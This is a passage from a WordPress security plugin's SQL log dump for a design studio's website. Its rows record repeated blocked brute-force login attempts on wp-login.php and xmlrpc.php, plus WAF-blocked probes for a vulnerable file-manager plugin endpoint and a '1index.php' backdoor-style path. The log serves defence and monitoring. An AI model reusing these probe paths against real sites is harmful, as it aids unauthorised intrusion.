(KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9896,0.000000,1630442658.019154,'\0\0\0\0\0\0\0\0\0\0��ϴ�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9897,0.000000,1630443519.934137,'\0\0\0\0\0\0\0\0\0\0���MW',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9898,0.000000,1630444387.445084,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9899,0.000000,1630445066.583951,'\0\0\0\0\0\0\0\0\0\0��-���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Opera/9.80 (Windows NT 6.1; WOW64; MRA 6.0 (build 6089)) Presto/2.12.388 Version/12.16','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9900,0.000000,1630445241.962912,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9901,0.000000,1630446103.085011,'\0\0\0\0\0\0\0\0\0\0����}',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9902,0.000000,1630446967.135540,'\0\0\0\0\0\0\0\0\0\0���n\\�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9903,0.000000,1630447833.221963,'\0\0\0\0\0\0\0\0\0\0��`}��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9904,0.000000,1630448695.692519,'\0\0\0\0\0\0\0\0\0\0��_կ�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9905,0.000000,1630449559.225219,'\0\0\0\0\0\0\0\0\0\0����q�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9906,0.000000,1630450422.379524,'\0\0\0\0\0\0\0\0\0\0����aM',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9907,0.000000,1630451114.008129,'\0\0\0\0\0\0\0\0\0\0���c�}',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9908,0.000000,1630451281.893822,'\0\0\0\0\0\0\0\0\0\0���Y��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9909,0.000000,1630452156.718876,'\0\0\0\0\0\0\0\0\0\0���cr5',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9910,0.000000,1630453019.236930,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9911,0.000000,1630453247.174857,'\0\0\0\0\0\0\0\0\0\0��h�\Z',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9912,0.000000,1630454115.881994,'\0\0\0\0\0\0\0\0\0\0��(r��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9913,0.000000,1630454992.419696,'\0\0\0\0\0\0\0\0\0\0���aD�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9914,0.000000,1630455874.683030,'\0\0\0\0\0\0\0\0\0\0���㪽',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9915,1630458738.044771,1630458737.954100,'\0\0\0\0\0\0\0\0\0\0��n',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(9916,0.000000,1630463691.930292,'\0\0\0\0\0\0\0\0\0\0��Xc��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9917,0.000000,1630476423.955777,'\0\0\0\0\0\0\0\0\0\0���$O',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9918,1630488876.506399,1630488876.418800,'\0\0\0\0\0\0\0\0\0\0��%\0',0,403,0,0,0,'https://dogstardesign.co.uk/1index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzFpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(9919,1630488867.952802,1630488867.801100,'\0\0\0\0\0\0\0\0\0\0��%\0',0,403,0,0,0,'https://dogstardesign.co.uk/1index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzFpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(9920,0.000000,1630490412.281757,'\0\0\0\0\0\0\0\0\0\0��-���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 YaBrowser/14.5.1847.18825 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9921,0.000000,1630492089.289705,'\0\0\0\0\0\0\0\0\0\0���Do�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9922,0.000000,1630494123.987016,'\0\0\0\0\0\0\0\0\0\0���~Y�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php?redirect_to=https://dogstardesign.co.uk/wp-admin//&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(9923,0.000000,1630498184.827380,'\0\0\0\0\0\0\0\0\0\0����S',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)','loginFailInvalidUsername',NULL,NULL),(9924,0.000000,1630504700.677302,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9925,0.000000,1630517306.960762,'\0\0\0\0\0\0\0\0\0\0����:',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailInvalidUsername',NULL,NULL),(9926,0.000000,1630529601.957297,'\0\0\0\0\0\0\0\0\0\0��%�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailInvalidUsername',NULL,NULL),(9927,0.000000,1630529609.590150,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://www.dogstardesign.co.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(9928,0.000000,1630531181.615429,'\0\0\0\0\0\0\0\0\0\0��-���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Opera/9.80 (Windows NT 6.1; WOW64; MRA 6.3 (build 8003)) Presto/2.12.388 Version/12.16','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9929,0.000000,1630541652.042145,'\0\0\0\0\0\0\0\0\0\0��R�v�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9930,0.000000,1630553583.252840,'\0\0\0\0\0\0\0\0\0\0��%;J�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9931,0.000000,1630565511.048357,'\0\0\0\0\0\0\0\0\0\0���GȽ',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9932,0.000000,1630565632.786776,'\0\0\0\0\0\0\0\0\0\0��*u:�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(9933,0.000000,1630565635.910506,'\0\0\0\0\0\0\0\0\0\0��*u:�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(9934,0.000000,1630565638.611046,'\0\0\0\0\0\0\0\0\0\0��*u:�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(9935,0.000000,1630565641.068413,'\0\0\0\0\0\0\0\0\0\0��*u:�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(9936,0.000000,1630565643.880087,'\0\0\0\0\0\0\0\0\0\0��*u:�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(9937,0.000000,1630565646.262346,'\0\0\0\0\0\0\0\0\0\0��*u:�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(9938,0.000000,1630565648.468077,'\0\0\0\0\0\0\0\0\0\0��*u:�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(9939,0.000000,1630577149.653647,'\0\0\0\0\0\0\0\0\0\0��\r�S�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9940,0.000000,1630577464.797422,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9941,1630577686.574794,1630577686.478700,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(9942,1630577629.538330,1630577629.438400,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(9943,1630577580.255585,1630577580.157000,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(9944,1630577516.813054,1630577516.697700,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(9945,0.000000,1630589018.253156,'\0\0\0\0\0\0\0\0\0\0��ϴΥ',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9946,0.000000,1630604415.417223,'\0\0\0\0\0\0\0\0\0\0��3Dx�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9947,0.000000,1630607965.405217,'\0\0\0\0\0\0\0\0\0\0��-���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1969.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9948,0.000000,1630616101.401746,'\0\0\0\0\0\0\0\0\0\0���$O',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9949,0.000000,1630627822.704842,'\0\0\0\0\0\0\0\0\0\0���߷',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9950,0.000000,1630632998.078933,'\0\0\0\0\0\0\0\0\0\0����<',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9951,0.000000,1630633080.782903,'\0\0\0\0\0\0\0\0\0\0��]q�v',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9952,0.000000,1630633303.638711,'\0\0\0\0\0\0\0\0\0\0��gyY�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9953,0.000000,1630634361.499354,'\0\0\0\0\0\0\0\0\0\0���@v7',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9954,0.000000,1630634388.379907,'\0\0\0\0\0\0\0\0\0\0��$\\',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9955,0.000000,1630635505.187548,'\0\0\0\0\0\0\0\0\0\0���!',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9956,0.000000,1630635826.638058,'\0\0\0\0\0\0\0\0\0\0���@tU',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9957,0.000000,1630635849.663672,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9958,0.000000,1630636309.926053,'\0\0\0\0\0\0\0\0\0\0��R@�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9959,0.000000,1630637307.321807,'\0\0\0\0\0\0\0\0\0\0��g�ʖ',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9960,0.000000,1630637309.363165,'\0\0\0\0\0\0\0\0\0\0��>�',0,200,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(9961,0.000000,1630637573.215036,'\0\0\0\0\0\0\0\0\0\0����-�',0,503,0,0,0,'https://www.dogstardesign.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9962,0.000000,1630637705.551252,'\0\0\0\0\0\0\0\0\0\0�����^',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9963,0.000000,1630638517.031749,'\0\0\0\0\0\0\0\0\0\0��e >�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9964,0.000000,1630638517.031820,'\0\0\0\0\0\0\0\0\0\0�����Q',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9965,0.000000,1630639123.316418,'\0\0\0\0\0\0\0\0\0\0����2',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9966,0.000000,1630639146.434940,'\0\0\0\0\0\0\0\0\0\0��\"V��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9967,0.000000,1630639458.758309,'\0\0\0\0\0\0\0\0\0\0��3Dx�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9968,0.000000,1630639737.608581,'\0\0\0\0\0\0\0\0\0\0���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9969,0.000000,1630639769.041149,'\0\0\0\0\0\0\0\0\0\0��{+�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9970,0.000000,1630639903.448834,'\0\0\0\0\0\0\0\0\0\0��-(��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9971,0.000000,1630640287.537790,'\0\0\0\0\0\0\0\0\0\0����6�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9972,0.000000,1630640305.604340,'\0\0\0\0\0\0\0\0\0\0���5�i',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9973,0.000000,1630640840.079998,'\0\0\0\0\0\0\0\0\0\0���\0�D',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security 